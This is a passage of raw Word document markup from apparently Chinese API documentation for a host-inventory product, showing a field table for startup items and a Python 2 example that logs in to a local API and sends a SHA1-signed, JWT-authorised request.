            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E6787FF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Interger</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54D90239" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24373494" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>默认启动模式(仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="49E3C188" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21FA80A7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>xinetd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22265006" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>布尔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32D8C95A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41B14D00" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>启动方式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="24F7AAA9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="418451A7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C3D45F1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25B0F2F6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10659AFE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>服务启动用户windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6D8989AD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C5AEB90" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>enable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="570BC8CE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>布尔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A236A56" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BB36DD6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>服务的状态windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="771744BA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50739102" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>startType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C8EC793" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C8B480B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5657885D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>启动类型windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="222F5B8D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52B497D1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>publisher</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75311DB1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="784CF74C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>64)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BB8234F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>发布者windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7D2A56BB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DD7FF80" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>showName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32718BB8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4909F0DA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D69C153" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>启动项名（仅windows）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5C4E2C02" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>windows启动项代码示例(python)：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFB2E1B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>#! /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/bin/env python</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># -*- coding: utf-8 -*-</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">from __future__ import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>absolute_import</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>httplib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t>import time</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hashlib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>host = "127.0.0.1"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>port = 80</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># 登录请求调用示例</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>def login():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    conn = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>httplib.HTTPConnection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "http://%s:%s/v1/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/auth" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    header = {"Content-Type": "application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    body = {"username": "dev@xx.com", "password": "abc@123"}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json_body</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json.dumps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(body)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>conn.request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(method="POST", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, body=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json_body</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, headers=header)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    response = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>conn.getresponse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>response.read</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json.loads</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(res)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># 发送请求</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>send_request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(method, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, data):</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    # 参看登录认证里面的登录方法代码示例</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>login_result</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = login()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sign_key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>login_result.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("data").get("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>signKey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>")</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jwt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>login_result.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("data").get("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jwt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>")</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>login_result.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("data").get("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>")</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    # 当前时间戳</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = int(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>time.time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>())</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    if data is not None:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        info = ""</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        if method == "GET":</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            # 对参数key进行字典排序</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            keys = sorted(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>data.keys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>())</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            for key in keys:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                info = info + key + str(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>data.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(key))</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                print info</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elif</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> method == "POST" or method == "PUT" or method == "DELETE":</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            info = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json.dumps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        # 拼接待签名字符串</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>to_sign</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> + info + str(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sign_key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    else:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        # 拼接待签名字符串</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>to_sign</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> + str(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sign_key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    print </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>to_sign</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    # 对待签名字符串进行sha1得到签名字符串</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    sign = hashlib.sha1(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>to_sign</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>).</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hexdigest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    # 组装http请求头参数</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    header = {"Content-Type": "application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">": </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, "timestamp": </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">              "sign": sign, "Authorization": "Bearer " + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jwt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    conn = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>httplib.HTTPConnection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>conn.request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(method=method, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, body=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json.dumps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(data), headers=header)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    response = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>conn.getresponse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>response.read</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
